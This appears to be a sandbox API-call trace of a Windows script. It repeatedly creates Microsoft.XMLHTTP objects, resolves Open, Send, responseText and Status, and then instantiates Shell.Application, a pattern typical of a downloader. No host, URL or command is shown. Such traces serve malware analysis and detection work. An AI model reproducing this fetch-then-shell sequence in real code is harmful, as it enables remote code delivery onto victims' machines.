	[0388.610] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0388.612] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.613] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0388.613] SysStringLen (param_1=0x0) returned 0x0
	[0388.613] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0388.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0388.613] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0388.613] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0388.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0388.613] ??2@YAPEAX_K@Z () returned 0x62f310
	[0388.613] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0388.613] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0388.613] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0388.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0388.613] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0388.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0388.614] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0388.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.614] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0388.614] SysStringLen (param_1=0x0) returned 0x0
	[0388.614] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0388.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0388.614] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0388.614] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0388.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0388.614] ??2@YAPEAX_K@Z () returned 0x62f330
	[0388.615] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0388.615] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0388.615] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0388.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0388.615] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0388.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0388.615] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0388.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.615] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0388.615] SysStringLen (param_1=0x0) returned 0x0
	[0388.615] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0388.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0388.616] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0388.616] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0388.616] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0388.616] ??2@YAPEAX_K@Z () returned 0x62f310
	[0388.616] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0388.616] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0388.616] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0388.616] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0388.616] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0388.616] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0388.616] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0388.616] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.616] longjmp () 
	[0388.617] longjmp () 
	[0388.617] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0388.617] SysStringLen (param_1=0x0) returned 0x0
	[0388.617] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0388.617] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0388.617] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0388.617] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0388.617] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0388.617] ??2@YAPEAX_K@Z () returned 0x62f330
	[0388.617] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0388.617] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0388.617] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0388.617] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0388.617] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0388.617] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0388.618] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0388.618] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.618] longjmp () 
	[0388.618] longjmp () 
	[0388.618] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0388.618] SysStringLen (param_1=0x0) returned 0x0
	[0388.618] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0388.618] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0388.618] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0388.618] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0388.618] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0388.619] ??2@YAPEAX_K@Z () returned 0x62f310
	[0388.619] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0388.619] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0388.619] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0388.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0388.619] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0388.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0388.619] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0388.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0388.619] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0388.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0389.929] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0389.929] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0389.929] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0389.929] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0389.929] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0389.929] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0389.929] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0389.929] SysStringLen (param_1=0x0) returned 0x0
	[0389.929] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0389.930] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
